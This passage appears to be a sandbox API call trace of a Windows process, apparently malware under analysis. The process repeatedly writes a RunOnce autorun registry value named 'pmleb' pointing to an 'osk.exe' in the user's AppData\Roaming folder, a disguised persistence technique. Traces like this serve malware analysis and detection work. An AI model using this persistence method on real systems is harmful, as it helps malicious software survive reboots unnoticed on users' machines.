[0084.934] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.934] RegCloseKey (hKey=0x280) returned 0x0 [0084.934] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.934] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.935] SetTimer (hWnd=0x20280, nIDEvent=0x218c, uElapse=0xa, lpTimerFunc=0x0) returned 0x218c [0084.935] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.948] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.948] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.948] KillTimer (hWnd=0x20280, uIDEvent=0x218c) returned 1 [0084.948] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.949] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.949] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.949] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.949] RegCloseKey (hKey=0x280) returned 0x0 [0084.949] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.949] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.949] SetTimer (hWnd=0x20280, nIDEvent=0x218d, uElapse=0xa, lpTimerFunc=0x0) returned 0x218d [0084.950] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.964] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.964] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.964] KillTimer (hWnd=0x20280, uIDEvent=0x218d) returned 1 [0084.964] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.965] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.965] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.965] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.965] RegCloseKey (hKey=0x280) returned 0x0 [0084.965] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.965] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.965] SetTimer (hWnd=0x20280, nIDEvent=0x218e, uElapse=0xa, lpTimerFunc=0x0) returned 0x218e [0084.966] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.979] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.979] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.980] KillTimer (hWnd=0x20280, uIDEvent=0x218e) returned 1 [0084.980] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.980] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.980] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.981] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.981] RegCloseKey (hKey=0x280) returned 0x0 [0084.981] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.981] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.981] SetTimer (hWnd=0x20280, nIDEvent=0x218f, uElapse=0xa, lpTimerFunc=0x0) returned 0x218f [0084.981] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.994] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.994] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.994] KillTimer (hWnd=0x20280, uIDEvent=0x218f) returned 1 [0084.995] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.995] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.995] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.995] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.996] RegCloseKey (hKey=0x280) returned 0x0 [0084.996] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.996] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.996] SetTimer (hWnd=0x20280, nIDEvent=0x2190, uElapse=0xa, lpTimerFunc=0x0) returned 0x2190 [0084.996] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.010] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.010] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.010] KillTimer (hWnd=0x20280, uIDEvent=0x2190) returned 1 [0085.010] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.011] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.011] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.011] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.011] RegCloseKey (hKey=0x280) returned 0x0 [0085.011] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.011] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.011] SetTimer (hWnd=0x20280, nIDEvent=0x2191, uElapse=0xa, lpTimerFunc=0x0) returned 0x2191 [0085.012] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.025] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.025] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.026] KillTimer (hWnd=0x20280, uIDEvent=0x2191) returned 1 [0085.026] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.026] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.026] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.027] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.027] RegCloseKey (hKey=0x280) returned 0x0 [0085.027] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.027] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.027] SetTimer (hWnd=0x20280, nIDEvent=0x2192, uElapse=0xa, lpTimerFunc=0x0) returned 0x2192 [0085.027] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.041] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.041] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.041] KillTimer (hWnd=0x20280, uIDEvent=0x2192) returned 1 [0085.042] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.042] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.042] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.042] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.043] RegCloseKey (hKey=0x280) returned 0x0 [0085.043] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.043] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.043] SetTimer (hWnd=0x20280, nIDEvent=0x2193, uElapse=0xa, lpTimerFunc=0x0) returned 0x2193 [0085.043] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.057] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.057] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.057] KillTimer (hWnd=0x20280, uIDEvent=0x2193) returned 1 [0085.057] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.057] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.058] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.058] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.058] RegCloseKey (hKey=0x280) returned 0x0 [0085.058] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.058] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.058] SetTimer (hWnd=0x20280, nIDEvent=0x2194, uElapse=0xa, lpTimerFunc=0x0) returned 0x2194 [0085.058] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.074] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.074] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.074] KillTimer (hWnd=0x20280, uIDEvent=0x2194) returned 1 [0085.074] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.075] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.075] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.075] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.075] RegCloseKey (hKey=0x280) returned 0x0 [0085.075] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.075] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.075] SetTimer (hWnd=0x20280, nIDEvent=0x2195, uElapse=0xa, lpTimerFunc=0x0) returned 0x2195 [0085.075] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.088] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.088] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.088] KillTimer (hWnd=0x20280, uIDEvent=0x2195) returned 1 [0085.088] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.089] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.089] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.089] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.089] RegCloseKey (hKey=0x280) returned 0x0 [0085.089] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.089] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.089] SetTimer (hWnd=0x20280, nIDEvent=0x2196, uElapse=0xa, lpTimerFunc=0x0) returned 0x2196 [0085.089] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.103] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.103] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.104] KillTimer (hWnd=0x20280, uIDEvent=0x2196) returned 1 [0085.104] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.104] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.104] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.105] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.105] RegCloseKey (hKey=0x280) returned 0x0 [0085.105] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.105] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.105] SetTimer (hWnd=0x20280, nIDEvent=0x2197, uElapse=0xa, lpTimerFunc=0x0) returned 0x2197 [0085.105] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.119] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.119] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.119] KillTimer (hWnd=0x20280, uIDEvent=0x2197) returned 1 [0085.120] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.120] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.120] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.120] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.121] RegCloseKey (hKey=0x280) returned 0x0 [0085.121] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.121] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.121] SetTimer (hWnd=0x20280, nIDEvent=0x2198, uElapse=0xa, lpTimerFunc=0x0) returned 0x2198 [0085.121] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.135] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.135] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.135] KillTimer (hWnd=0x20280, uIDEvent=0x2198) returned 1 [0085.135] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.136] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.136] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.136] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.136] RegCloseKey (hKey=0x280) returned 0x0 [0085.136] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.137] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.137] SetTimer (hWnd=0x20280, nIDEvent=0x2199, uElapse=0xa, lpTimerFunc=0x0) returned 0x2199 [0085.137] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.166] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.166] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.167] KillTimer (hWnd=0x20280, uIDEvent=0x2199) returned 1 [0085.167] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.167] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.167] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.168] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.168] RegCloseKey (hKey=0x280) returned 0x0 [0085.168] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.168] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.168] SetTimer (hWnd=0x20280, nIDEvent=0x219a, uElapse=0xa, lpTimerFunc=0x0) returned 0x219a [0085.168] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.181] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.181] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.182] KillTimer (hWnd=0x20280, uIDEvent=0x219a) returned 1 [0085.182] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.182] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.183] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.183] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.183] RegCloseKey (hKey=0x280) returned 0x0 [0085.183] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.183] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.183] SetTimer (hWnd=0x20280, nIDEvent=0x219b, uElapse=0xa, lpTimerFunc=0x0) returned 0x219b [0085.183] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.197] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.197] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.197] KillTimer (hWnd=0x20280, uIDEvent=0x219b) returned 1 [0085.197] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.198] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.198] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.198] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.198] RegCloseKey (hKey=0x280) returned 0x0 [0085.198] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.199] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.199] SetTimer (hWnd=0x20280, nIDEvent=0x219c, uElapse=0xa, lpTimerFunc=0x0) returned 0x219c [0085.199] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.213] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.213] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.213] KillTimer (hWnd=0x20280, uIDEvent=0x219c) returned 1 [0085.213] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.214] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.214] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.214] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.214] RegCloseKey (hKey=0x280) returned 0x0 [0085.214] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.214] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.214] SetTimer (hWnd=0x20280, nIDEvent=0x219d, uElapse=0xa, lpTimerFunc=0x0) returned 0x219d [0085.215] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.230] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.230] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.230] KillTimer (hWnd=0x20280, uIDEvent=0x219d) returned 1 [0085.230] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.231] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.231] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.231] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.231] RegCloseKey (hKey=0x280) returned 0x0 [0085.231] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.231] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.231] SetTimer (hWnd=0x20280, nIDEvent=0x219e, uElapse=0xa, lpTimerFunc=0x0) returned 0x219e [0085.232] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.244] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.244] 